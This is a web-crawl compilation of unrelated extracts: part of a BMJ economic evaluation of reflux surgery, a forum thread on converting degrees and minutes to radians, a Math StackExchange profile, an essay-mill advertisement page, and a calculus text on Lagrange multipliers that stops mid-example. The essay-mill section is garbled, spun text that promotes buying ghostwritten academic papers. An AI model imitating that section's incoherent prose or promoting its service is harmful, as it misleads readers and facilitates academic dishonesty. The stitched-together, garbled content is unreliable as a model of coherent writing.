represents full health.16 Table 1 shows the mean differences in utility between treatments at one year estimated by the REFLUX trial.12 No other randomised trials have compared surgery with medication using a preference based measure of health related quality of life. We assumed that the “adjusted treatment received” analysis of the REFLUX trial12 was the most appropriate measure of the effect of surgery on health related quality of life to use in the base case model. 
This approach identifies the efficacy of surgery in patients who are most likely to comply with their clinicians’ recommendations for treatment.17 18 We also used intention to treat and per protocol estimates in sensitivity analyses. In the model, we use the term “treatment effect” to refer to the difference in health related quality of life between medical management and those who do not fail surgery. This value differs from the estimates calculated in the trial, which measured the mean difference in health related quality of life between medical management and surgery, whether failed or not. As those who fail surgery would be expected to have lower health related quality of life than those who do not, this approach estimates a lower bound for the benefits of surgery by the model. We estimated the health related quality of life of the 15 patients in the surgery group of the REFLUX trial who required proton pump inhibitors at one year to be 0.68 (standard error 0.048) using the EQ-5D, a decrease of 0.04 from baseline. In view of the small sample of patients and short follow-up, it was assumed in the base case analysis that patients who needed proton pump inhibitors after surgery returned to their baseline (pre-surgery) health related quality of life, consistent with clinical opinion (Robert Heading, personal communication, 2008) that proton pump inhibitors are just as effective after surgery as before, provided they are being used to treat reflux symptoms. This assumption was varied in sensitivity analysis. To account for the decline in health related quality of life with age, the mean utility for medical management observed at the end of the REFLUX trial was compared with the average utility for the general population aged 45-55,19 to calculate a proportionate decrement in utility for that health state. It was assumed that this proportionate decrement was constant as the cohort aged (table 1).

### Analysis

We did calculations using Excel. The model estimated mean costs and quality adjusted life years in each treatment cohort. Where one treatment did not dominate the other, the incremental cost effectiveness ratio was calculated as the ratio of the difference in expected costs to the difference in expected quality adjusted life years. A probabilistic sensitivity analysis was done by assigning probability distributions to the model inputs, rather than treating them as point estimates.20 This analysis calculated the overall uncertainty in the treatment decision as the proportion of simulations where laparoscopic surgery is cost effective, given threshold values for the incremental cost-effectiveness ratio of £20 000 and £30 000 per quality adjusted life year as used by the National Institute for Health and Clinical Excellence.10

## Results

Table 2 shows the use of health service resources and cost for GORD related causes during the first year of follow-up in the REFLUX trial,12 for patients receiving their randomised treatment per protocol.
Total costs were £370 per patient in the medical management arm and £2709 in the surgical arm, a difference of £2339 (95% confidence interval 2147 to 2558; calculated with bias corrected accelerated bootstrap).21

Table 2 Mean use of healthcare resources and costs for GORD related causes in REFLUX trial12 for patients receiving their randomised treatment per protocol and followed up for one year

Under base case assumptions, the model predicts that, for example, by five years 17.7% of surgery patients will have returned to medical management, 2.9% will have undergone a re-operation, and 0.1% will have died during surgery. The average discounted lifetime cost per patient of surgery was £5026, made up of the initial cost of surgery (£2132), repair of surgery (£746), return to medical management (£1360) and other health care (£788). The discounted lifetime cost of the medical management group was £3411. Therefore, surgery had an additional mean cost of £1616. The mean difference in quality adjusted life years was 0.61, equating to an incremental cost effectiveness ratio of £2648 per quality adjusted life year (table 3, scenario 1). In the base case, the probability that surgery is cost effective at a cost effectiveness threshold of £20 000 is 0.94.

Table 3 Results of base case economic model and sensitivity analyses. Expected costs and QALYs per patient in each scenario were calculated as mean of 1000 simulations using probabilistic model

We explored several scenarios regarding the size and duration of treatment effect, GORD symptoms of those who fail surgery, and costs (table 3). Use of intention to treat and per protocol estimates of effect did not change the conclusion that surgery is cost effective assuming a threshold of £20 000 per quality adjusted life year gained. The probability that surgery is cost effective decreases to 0.77 if patients who return to proton pump inhibitors have worse GORD symptoms than before surgery (scenario 7). Surgery is unlikely to be cost effective if it is assumed that its benefits (in terms of health related quality of life relative to medical management) are not maintained beyond one year (scenario 4). Surgery might also not be cost effective in some multivariate sensitivity analyses. For example, the incremental cost effectiveness ratio increases to about £22 000 if proton pump inhibitors can be effectively delivered at half the cost estimated here—perhaps due to greater use of lower cost drugs—and there is no difference in health related quality of life after two years (scenario 16).

## Discussion

### Principal findings

Under base case assumptions, surgery is cost effective on average with an incremental cost-effectiveness ratio of £2648 per quality adjusted life year. The probability of surgery being cost effective is high given a threshold of £20 000 per quality adjusted life year and assuming the treatment effect lasts for at least five years and patients who fail surgery do not have worse symptoms than before surgery. The results of this analysis are similar to those of Bojke8 who also found surgery to be cost effective. That model was constructed using baseline utility data from the REFLUX trial but did not include the treatment effect of surgery at one year.

### Strengths and weaknesses of this study

We have compared the cost effectiveness of laparoscopic surgery with that of medical management using randomised data on the effect of treatment on health related quality of life.
The REFLUX trial was a pragmatic study and the results, in terms of symptom control and health related quality of life, are expected to be generalisable to patients in the UK who are stable on GORD medication and suitable for surgery.22 Nevertheless, because rates of surgical reintervention and return to medical management in clinical practice might differ from the trial or with longer follow-up,23 we have used mean rates from a literature review to inform this analysis. In the base case we used the “adjusted treatment” received estimate of the treatment efficacy. Intention to treat and per protocol estimates were also used in sensitivity analyses. The intention to treat analysis is an unbiased estimate of effectiveness but is diluted by the high proportion (38%) of patients in the REFLUX trial who were randomised to surgery but did not receive it.12 The most common reason given for non-compliance was patient choice, which was thought to be affected by long waiting times.12 Given that waiting times vary between centres and over time, the intention to treat estimate in the REFLUX trial might not be generalisable to current practice in the NHS. The per protocol analysis adjusting for baseline age, sex, body mass index, and EQ-5D score is another measure of the efficacy of surgery12 but using regression to adjust for observed baseline characteristics may not adequately control for selection bias. Regardless of whether an adjusted treatment received, intention to treat or per protocol analysis is conducted, surgery appears to be cost effective at the thresholds used by NICE (National Institute for Health and Clinical Excellence), if it is assumed that health related quality of life is maintained over the long term. Costs of medication were calculated using current pack prices24 applied to the prescribing pattern observed in REFLUX.12 Some evidence indicates that prescribers have been switching to lower cost proton pump inhibitors such as lansoprazole or omeprazole following sharp reductions in their prices in recent years, and consequently the current cost of medical management may be lower than estimated here.4 However, surgery remains cost effective even if the annual cost of medication is half that in the base case, other considerations being equal. Nevertheless, in some scenarios surgery is unlikely to be cost effective, particularly where costs of medical management are lower than calculated in the base case and the health related quality of life benefit of surgery is not maintained over the long term. The duration of the treatment effect is, therefore, an important but uncertain assumption. To inform this question, follow up of REFLUX trial patients has been extended to five years. Given the results of the trial so far and the assumptions made in the decision model, extending the follow up of the trial from one year (scenario 4) to five years (scenario 6) would increase the probability that surgery is cost effective at a threshold of £20 000 per quality adjusted life year from 0.20 to 0.88. However, under more pessimistic assumptions about health related quality of life of patients who return to medical management, then even five years of follow-up would still leave considerable uncertainty about the value of surgery. ### Conclusions Although surgery seems likely to be cost effective in terms of expected (mean) costs and health effects, uncertainty remains about the duration of the treatment effect and the severity of GORD symptoms after failure of surgery. 
Furthermore, a number of practical issues need to be considered before the NHS could offer surgery to all patients who are currently stable on medical management. In particular, surgical capacity and availability of trained surgeons are potential barriers to implementation that would need to be addressed. #### What is already known on this topic Laparoscopic surgery is an efficacious treatment of stable GORD that would otherwise require medical management Surgery is costly in the short term, but these costs may be at least partly offset by less lifetime use of anti-GORD medication This study compared the cost effectiveness of laparoscopic surgery and medical management using randomised data on the effect of treatment on health related quality of life The findings indicate that laparoscopic surgery is cost effective provided that clinical benefits are sustained in the medium to long term ## Notes Cite this as: BMJ 2009;339:b2576 ## Footnotes • Trial team: Aberdeen—Marion Campbell, Adrian Grant, Craig Ramsay, Samantha Wileman; York—Garry Barton (1999-2002), Laura Bojke, David Epstein, Sue Macran, Mark Sculpher. Trial steering group: Wendy Atkin (independent chair), John Bancewicz, Ara Darzi, Robert Heading, Janusz Jankowski, Zygmunt Krukowski, Richard Lilford, Iain Martin (1997-2000), Ashley Mowat, Ian Russell, Mark Thursz. Data monitoring committee: Jon Nicholl, Chris Hawkey, Iain MacIntyre. Wendy Atkin, Janusz Jankowski, Richard Lilford, Jon Nicholl, Chris Hawkey, and Iain MacIntyre were independent of the trial. Members of the reflux trial group responsible for recruitment in the clinical centres were as follows. Aberdeen Royal Infirmary: A Mowat, Z Krukowski, E El-Omar, P Phull, T Sinclair, L Swan. Belfast Victoria Hospital: B Clements, J Collins, A Kennedy, H Lawther, B Mulvenna. Royal Bournemouth Hospital: D Bennett, N Davies, M McCullen, S Toop, P Winwood. Bristol Royal Infirmary: D Alderson, P Barham, K Green, R Mountford, S Tranter, R Mittal. Princess Royal University Hospital, Bromley: M Asante, L Barr, S El Hasani. Royal Infirmary of Edinburgh: A De Beaux, R Heading, L Meekison, S Paterson-Brown, H Barkell. Royal Surrey County Hospital, Guildford: G Ferns, M Bailey, N Karanjia, TA Rockall, L Skelly, M Smith. Hull Royal Infirmary: M Dakkak, J King, C Royston, P Sedman. Raigmore Hospital, Inverness: K Gordon, I McGauran, LF Potts, C Smith, PL Zentler-Munro, A Munro. General Infirmary at Leeds: A Axon, B Chanley, S Dexter, M McMahon, P Maoyeddi. Leicester Royal Infirmary: DM Lloyd, A Palmer-Jeffrey, B Rathbone. St Mary’s Hospital, London: V Loh, M Thursz, A Darzi. Whipps Cross Hospital, London: A Ahmed, R Greaves, A Sawyerr, J Wellwood, T Taylor. Poole Hospital: S Hosking, T Karlowski, S Lowrey, N Sharer, J Snook. Queen Alexandra Hospital, Portsmouth: H D Duncan, P Goggin, T Johns, A Quine, S Somers, S Toh. Hope Hospital, Salford: SEA Attwood, C Babbs, J Bancewicz, M Greenhalgh, W Rees, A Robinson. North Staffordshire Hospital, Stoke-on-Trent: T Bowling, Dr Brind, CVN Cheruvu, M Deakin, S Evans, R Glass, J Green, F Leslie, JB Elder. Morriston Hospital, Swansea: JN Baxter, P Duane, MM Rahman, M Thomas, J Williams. Princess Royal Hospital, Telford: J Bateman, D Maxton, N Moreton, A Sigurdsson, MSH Smith, G Townson. Yeovil District Hospital: N Beacham, C Buckley, S Gore, RH Kennedy, ZH Khan, J Knight, L Martin. York District Hospital: D Alexander, S Kelly, G Miller, D Parker, A Turnbull, J Turvill, W Wong, L Delaney. 
• Contributors: All authors took part in the REFLUX trial and have seen and approved the final version of the manuscript. MS was responsible for the economic evaluation section of the grant application and protocol, and LB and DE conducted the economic analysis for the paper. • Funding: This study was commissioned and funded by the National Coordinating Centre for Health Technology Assessment (NCCHTA). The funder of this study, other than the initial peer review process prior to funding and six-monthly progress reviews, did not have any involvement in study design; in the collection, analysis, and interpretation of data; in the writing of the report; or in the decision to submit the paper for publication. The views expressed in this report are those of the authors and not necessarily those of the NCCHTA or the funders that provide institutional support for the authors of this report. • Competing interests: None declared. • Ethical approval: Approval for this study was obtained from the Scottish Multicentre Research Ethics Committee and the appropriate local research ethics committees. This is an open-access article distributed under the terms of the Creative Commons Attribution Non-commercial License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited. View Abstract
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2565746307373047, "perplexity": 5242.23822807257}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320302723.60/warc/CC-MAIN-20220121040956-20220121070956-00597.warc.gz"}
https://www.physicsforums.com/threads/circles-transform-degrees-in-minute.883591/
# B Circles -- transform degrees in minute

1. Aug 30, 2016
### NickTesla
My question is about the division 10800/1110 ???
Last edited by a moderator: Aug 30, 2016

2. Aug 30, 2016
### Staff: Mentor
They started with the notion that 180 degrees = $\pi$ radians and then the equivalent notion that 10800 minutes = $\pi$ radians, and then they construct a ratio 180 deg / (18 deg 30 min) = (10800 min) / (1110 min) = 360 / 37 = $\pi$ / x radians and then solve for x.

3. Aug 30, 2016
### NickTesla
My question is to simplify, how do I simplify? Method of successive division!
Last edited by a moderator: Aug 30, 2016

4. Aug 30, 2016
### Staff: Mentor
Simplify what? I don't see anywhere in your thread what it is you're trying to do. Is the problem to convert 18° 30' into minutes? Or is it to convert this angle measure to radians?

5. Aug 30, 2016
### NickTesla
I'm trying to understand the simplification, should be 30 to 10800 and 30 to 1110, lol. Thank you for letting me know
Last edited by a moderator: Aug 30, 2016

6. Aug 30, 2016
### Staff: Mentor
You didn't answer my question. What are you trying to convert? Is your question how they went from $\frac{10800}{1110}$ to $\frac{360}{37}$? If so, 10800 = 30 * 360, and 1110 = 30 * 37.

7. Aug 31, 2016
### NickTesla
Perfect, it is 30

8. Aug 31, 2016
### NickTesla
Thank you!!
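For anyone who wants to check the arithmetic in the thread mechanically, here is a short Python sketch (the variable names are just for illustration):

```python
# Verify that 18 deg 30 min = 1110 minutes, that 10800/1110 reduces by 30
# to 360/37, and compute the angle in radians.
from fractions import Fraction
import math

deg, minutes = 18, 30
angle_min = deg * 60 + minutes          # 18 deg 30 min = 1110 minutes
half_turn_min = 180 * 60                # 180 deg = 10800 minutes = pi radians

ratio = Fraction(half_turn_min, angle_min)   # Fraction divides out gcd(10800, 1110)
print(ratio)                                 # 360/37
print(math.gcd(half_turn_min, angle_min))    # 30
x = math.pi / ratio                          # x = pi * 37/360 radians
print(x)                                     # about 0.3229 rad
```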
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7721037268638611, "perplexity": 7835.301185802816}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934805881.65/warc/CC-MAIN-20171119234824-20171120014824-00482.warc.gz"}
http://math.stackexchange.com/users/60449/skull-kid
# Skull_Kid less info reputation 4 bio website location age member for 1 year, 1 month seen Feb 5 '13 at 18:15 profile views 7 # 1 Question 4 Limit of $\frac{\sin(x+y)}{x+y}$ as $(x,y) \to (0,0)$ # 23 Reputation +20 Limit of $\frac{\sin(x+y)}{x+y}$ as $(x,y) \to (0,0)$ This user has not answered any questions # 2 Tags 0 limits 0 calculus # 1 Account Mathematics 23 rep 4
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2937433123588562, "perplexity": 7106.344946965593}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1394678704624/warc/CC-MAIN-20140313024504-00097-ip-10-183-142-35.ec2.internal.warc.gz"}
http://www.simovate.se/?p=9851
## Confidential Information About Type The Paper On Line Complimentary Just The Pros Find Out About Confidential Information About Type The Paper On Line Complimentary Just The Pros Find Out About Just describe things you need and want your paper seems like and then we’ll suit your needs effectively. Therefore, you need to ensure that your paper is proofread and edited properly. Prior to having your paper done, it’s proofread and modified with good attention. Alternatively, you are stuck by having a different paper. Consequently, if you should be trying to find a kind my paper from scratch help, you are welcome to purchase it right here. It is possible to modify the paper in quantity of means. Fundamentally, you will be given a paper at a high price that is based mostly on all of the pages and content associated with essay combined with proximity for the due date. It’s not easy to learn who is able to assist compose my university paper for the money, or compose my paper free of charge, which could never be a thing that is smart. If for example the paper includes any spelling or grammar mistakes along with typos, they’ll certainly be corrected straight away by proofreaders. Hence, your exact paper is certainly going to be produced by a person who understands the industry well. As a result from utilizing our solutions, you will end up provided a paper that is custom-written’ll have the ability to utilize on your own purposes. Cartesian graph paper is just about the most popular variety of graph paper getting used. ## The Type that is foolproof My on line Free Strategy go right to the purchase web page and select which type of paper you anticipate from us. Any type of research paper has a specific framework that will be centered on few games. Whenever the paper is prepared, it will likely be designed for download. Following your paper ended up being finished, you will also be required to speed the writer. Aside from the method that you go for the paper, you can view our service could be of fantastic assist with you. Our term that is customized paper solutions permit you to just forget about boring tasks you don’t have to finish at the moment. Superior option would be to pay for essay. Our essay writing services are a straightforward, stress-free alternative to attaining your goals. Needless to express, the means that is ideal to purchase an essay on the web. Composing an essay is practically constantly a challenging task. Our 1-hour essay service that is writing be perfect solution for your needs. Your very essay that is best could be simply an individual step away. You may rest assured you will receive an ideal essay for appropriate money with us. ## The Downside chance of Type the Paper Online complimentary most readily useful expert online essay https://admission-essay.com writer ideal sites to obtain a study paper company is at your solutions. That it is going to be authentic, interesting, informative and well structured, in the event you would like a person to compose my paper fast but still in a suitable way and in accordance with all your requirements, you will be utterly happy if you are looking for somebody to compose my paper online and you wish to be confident. Luckily, so now you don’t have to suffer alone it is possible to order essay online and deal easily with all the aforementioned problems. Online sentence structure check site can raise your educational performance and knowledge of the particular language. 
## exactly just What everyone Dislikes About Type the Paper Online complimentary and exactly why

in the event that you ask us for assistance, you may possibly relax knowing your essay is likely to be published by genuine experts. With this explanation, you will be particular our help compose my paper meets and surpasses all expectations. In the event that you really feel seeking help with custom essay writing, do not think twice to pick our business. Consequently, should you may need assistance with an essay no problem! You should not request assistance that is anonymous money.

## the latest Fuss About Type the Paper on the web complimentary

To write my paper in contract along with scholastic rules is not a task that is simple for experts and specialists. You may be sure that we are going to find the writer that is ideal you. Just authors which are thinking about your topic spot shall put a bid to assist you. Click on the purchase key and quickly you will have a writer that is personal you will observe first-hand how much faster your projects could be achieved. You can also talk with your personal journalist regarding the internet to specify some additional nuances or fixing the task approach. Our writers that are professional give you a paper which will undoubtedly fulfill all of your needs. The authors will also be quite imaginative which contributes a great deal to the finest writing that is superior. Our authors can guarantee your paper won't have a plagiarism just since they find just genuine sources for the paper, plus they steer clear of the forms of bad habits that can cause plagiarism. Selecting online essay authors isn't a nightmare anymore. Our online essay article writers have actually lots of experience with researching topics that are numerous which means you should not worry that the paper is likely to be written superficially.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.16057169437408447, "perplexity": 1310.8698107439411}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578663470.91/warc/CC-MAIN-20190424214335-20190425000335-00348.warc.gz"}
https://math.libretexts.org/Courses/Misericordia_University/MTH_226%3A_Calculus_III/Chapter_14%3A_Functions_of_Multiple_Variables_and_Partial_Derivatives/3.19%3A_Lagrange_Multipliers
# 3.19: Lagrange Multipliers

Solving optimization problems for functions of two or more variables can be similar to solving such problems in single-variable calculus. However, techniques for dealing with multiple variables allow us to solve more varied optimization problems for which we need to deal with additional conditions or constraints. In this section, we examine one of the more common and useful methods for solving optimization problems with constraints.

### Lagrange Multipliers

In the previous section, an applied situation was explored involving maximizing a profit function, subject to certain constraints. In that example, the constraints involved a maximum number of golf balls that could be produced and sold in $$1$$ month $$(x),$$ and a maximum number of advertising hours that could be purchased per month $$(y)$$. Suppose these were combined into a single budgetary constraint, such as $$20x+4y≤216$$, that took into account both the cost of producing the golf balls and the number of advertising hours purchased per month. The goal is still to maximize profit, but now there is a different type of constraint on the values of $$x$$ and $$y$$. This constraint and the corresponding profit function $f(x,y)=48x+96y−x^2−2xy−9y^2 \nonumber$ together form an example of an optimization problem, and the function $$f(x,y)$$ is called the objective function. A graph of various level curves of the function $$f(x,y)$$ follows.

In Figure $$\PageIndex{1}$$, the value $$c$$ represents different profit levels (i.e., values of the function $$f$$). As the value of $$c$$ increases, the curve shifts to the right. Since our goal is to maximize profit, we want to choose a curve as far to the right as possible. If there were no restrictions on the number of golf balls the company could produce or the number of units of advertising available, then we could produce as many golf balls as we want, and advertise as much as we want, and there would not be a maximum profit for the company.
Unfortunately, we have a budgetary constraint that is modeled by the inequality $$20x+4y≤216.$$ To see how this constraint interacts with the profit function, Figure $$\PageIndex{2}$$ shows the graph of the line $$20x+4y=216$$ superimposed on the previous graph. As mentioned previously, the maximum profit occurs when the level curve is as far to the right as possible. However, the level of production corresponding to this maximum profit must also satisfy the budgetary constraint, so the point at which this profit occurs must also lie on (or to the left of) the red line in Figure $$\PageIndex{2}$$. Inspection of this graph reveals that this point exists where the line is tangent to the level curve of $$f$$. Trial and error reveals that this profit level seems to be around $$395$$, when $$x$$ and $$y$$ are both just less than $$5$$. We return to the solution of this problem later in this section.

From a theoretical standpoint, at the point where the profit curve is tangent to the constraint line, the gradients of both functions evaluated at that point must point in the same (or opposite) direction. Recall that the gradient of a function of more than one variable is a vector. If two vectors point in the same (or opposite) directions, then one must be a constant multiple of the other. This idea is the basis of the method of Lagrange multipliers.

Method of Lagrange Multipliers: One Constraint

Theorem $$\PageIndex{1}$$: Let $$f$$ and $$g$$ be functions of two variables with continuous partial derivatives at every point of some open set containing the smooth curve $$g(x,y)=k$$, where $$k$$ is a constant. Suppose that $$f$$, when restricted to points on the curve $$g(x,y)=k$$, has a local extremum at the point $$(x_0,y_0)$$ and that $$\vecs ∇g(x_0,y_0)≠0$$. Then there is a number $$λ$$ called a Lagrange multiplier, for which $\vecs ∇f(x_0,y_0)=λ\vecs ∇g(x_0,y_0).$

Proof

Assume that a constrained extremum occurs at the point $$(x_0,y_0).$$ Furthermore, we assume that the equation $$g(x,y)=k$$ can be smoothly parameterized as $$x=x(s) \; \text{and}\; y=y(s)$$ where $$s$$ is an arc length parameter with reference point $$(x_0,y_0)$$ at $$s=0$$. Therefore, the quantity $$z=f(x(s),y(s))$$ has a relative maximum or relative minimum at $$s=0$$, and this implies that $$\dfrac{dz}{ds}=0$$ at that point. From the chain rule, \begin{align*} \dfrac{dz}{ds} &=\dfrac{∂f}{∂x}⋅\dfrac{∂x}{∂s}+\dfrac{∂f}{∂y}⋅\dfrac{∂y}{∂s} \\[5pt] &=\left(\dfrac{∂f}{∂x}\hat{\mathbf i}+\dfrac{∂f}{∂y}\hat{\mathbf j}\right)⋅\left(\dfrac{∂x}{∂s}\hat{\mathbf i}+\dfrac{∂y}{∂s}\hat{\mathbf j}\right)\\[5pt] &=0, \end{align*} where the derivatives are all evaluated at $$s=0$$. However, the first factor in the dot product is the gradient of $$f$$, and the second factor is the unit tangent vector $$\vec{\mathbf T}(0)$$ to the constraint curve. Since the point $$(x_0,y_0)$$ corresponds to $$s=0$$, it follows from this equation that $\vecs ∇f(x_0,y_0)⋅\vecs{\mathbf T}(0)=0, \nonumber$ which implies that the gradient is either the zero vector $$\vecs 0$$ or it is normal to the constraint curve at a constrained relative extremum.
However, the constraint curve $$g(x,y)=k$$ is a level curve for the function $$g(x,y)$$ so that if $$\vecs ∇g(x_0,y_0)≠0$$ then $$\vecs ∇g(x_0,y_0)$$ is normal to this curve at $$(x_0,y_0)$$ It follows, then, that there is some scalar $$λ$$ such that $\vecs ∇f(x_0,y_0)=λ\vecs ∇g(x_0,y_0) \nonumber$ $$\square$$ To apply Theorem $$\PageIndex{1}$$ to an optimization problem similar to that for the golf ball manufacturer, we need a problem-solving strategy. Problem-Solving Strategy: Steps for Using Lagrange Multipliers 1. Determine the objective function $$f(x,y)$$ and the constraint function $$g(x,y).$$ Does the optimization problem involve maximizing or minimizing the objective function? 2. Set up a system of equations using the following template: \begin{align} \vecs ∇f(x,y) &=λ\vecs ∇g(x,y) \\[5pt] g(x,y)&=k \end{align}. 3. Solve for $$x$$ and $$y$$ to determine the Lagrange points, i.e., points that satisfy the Lagrange multiplier equation. 4. If the objective function is continuous on the constraint and the constraint is a closed curve (like a circle or an ellipse), then the largest of the values of $$f$$ at the solutions found in step $$3$$ maximizes $$f$$, subject to the constraint; the smallest of those values minimizes $$f$$, subject to the constraint. But in other cases, we need to evaluate the objective functions $$f$$ at points from the constraint on either side of each Lagrange point to determine whether we have obtained a relative maximum or a relative minimum. Note that it is possible that our objective function will not have a relative maximum or a relative minimum at a given Lagrange point. This can occur in a couple situations, but most often when the Lagrange point is also a critical point of the objective function giving us a saddle point. Most of the time we will still get a relative extremum at a saddle point subject to a constraint, but sometimes we will not. See Figure $$\PageIndex{3}$$ for an example of this case. Figure $$\PageIndex{3}$$: Graph of $$f(x,y)=x^2-y^3$$ along with the constraint $$(x-1)^2 + y^2 = 1$$. Note that there is no relative extremum at $$(0,0)$$, although this point will satisfy the Lagrange Multiplier equation with $$\lambda=0$$. Example $$\PageIndex{1}$$: Using Lagrange Multipliers Use the method of Lagrange multipliers to find the minimum value of $$f(x,y)=x^2+4y^2−2x+8y$$ subject to the constraint $$x+2y=7.$$ Solution 1. The objective function is $$f(x,y)=x^2+4y^2−2x+8y.$$ The constraint function is equal to the left-hand side of the constraint equation when only a constant is on the right-hand side. So here $$g(x,y)=x+2y$$. The problem asks us to solve for the minimum value of $$f$$, subject to the constraint (Figure $$\PageIndex{4}$$). 2. 
We then must calculate the gradients of both $$f$$ and $$g$$: $\vecs \nabla f \left( x, y \right) = \left( 2x - 2 \right) \hat{\mathbf{i}} + \left( 8y + 8 \right) \hat{\mathbf{j}} \\ \vecs \nabla g \left( x, y \right) = \hat{\mathbf{i}} + 2 \hat{\mathbf{j}}.$ The equation $$\vecs \nabla f \left( x, y \right) = \lambda \vecs \nabla g \left( x, y \right)$$ becomes $\left( 2 x - 2 \right) \hat{\mathbf{i}} + \left( 8 y + 8 \right) \hat{\mathbf{j}} = \lambda \left( \hat{\mathbf{i}} + 2 \hat{\mathbf{j}} \right),$ which can be rewritten as $\left( 2 x - 2 \right) \hat{\mathbf{i}} + \left( 8 y + 8 \right) \hat{\mathbf{j}} = \lambda \hat{\mathbf{i}} + 2 \lambda \hat{\mathbf{j}}.$ Next, we set the coefficients of $$\hat{\mathbf{i}}$$ and $$\hat{\mathbf{j}}$$ equal to each other: \begin{align} 2 x - 2 &= \lambda \\ 8 y + 8 &= 2 \lambda. \end{align} The equation $$g \left( x, y \right) = k$$ becomes $$x + 2 y = 7$$. Therefore, the system of equations that needs to be solved is \begin{align} 2 x - 2 &= \lambda \\ 8 y + 8 &= 2 \lambda \\ x + 2 y &= 7. \end{align}
3. This is a linear system of three equations in three variables. We start by solving the second equation for $$λ$$ and substituting it into the first equation. This gives $$λ=4y+4$$, so substituting this into the first equation gives $2x−2=4y+4.\nonumber$ Solving this equation for $$x$$ gives $$x=2y+3$$. We then substitute this into the third equation: \begin{align*} (2y+3)+2y&=7 \\[5pt]4y&=4 \\[5pt]y&=1. \end{align*} Since $$x=2y+3,$$ this gives $$x=5.$$
4. Next, we evaluate $$f(x,y)=x^2+4y^2−2x+8y$$ at the point $$(5,1)$$, $f(5,1)=5^2+4(1)^2−2(5)+8(1)=27.$ To ensure this corresponds to a minimum value on the constraint function, let’s try some other points on the constraint from either side of the point $$(5,1)$$, such as the intercepts of the constraint line $$x+2y=7$$, which are $$(7,0)$$ and $$(0,3.5)$$. We get $$f(7,0)=35 \gt 27$$ and $$f(0,3.5)=77 \gt 27$$. So it appears that $$f$$ has a relative minimum of $$27$$ at $$(5,1)$$, subject to the given constraint.

Exercise $$\PageIndex{1}$$

Use the method of Lagrange multipliers to find the maximum value of $f(x,y)=9x^2+36xy−4y^2−18x−8y \nonumber$ subject to the constraint $$3x+4y=32.$$

Hint

Use the problem-solving strategy for the method of Lagrange multipliers.

Answer

Subject to the given constraint, $$f$$ has a maximum value of $$976$$ at the point $$(8,2)$$.

Let’s now return to the problem posed at the beginning of the section.

Example $$\PageIndex{2}$$: Golf Balls and Lagrange Multipliers

The golf ball manufacturer, Pro-T, has developed a profit model that depends on the number $$x$$ of golf balls sold per month (measured in thousands), and the number of hours per month of advertising, $$y$$, according to the function $z=f(x,y)=48x+96y−x^2−2xy−9y^2, \nonumber$ where $$z$$ is measured in thousands of dollars. The budgetary constraint function relating the cost of the production of thousands of golf balls and advertising units is given by $$20x+4y=216.$$ Find the values of $$x$$ and $$y$$ that maximize profit, and find the maximum profit.

Solution:

Again, we follow the problem-solving strategy:

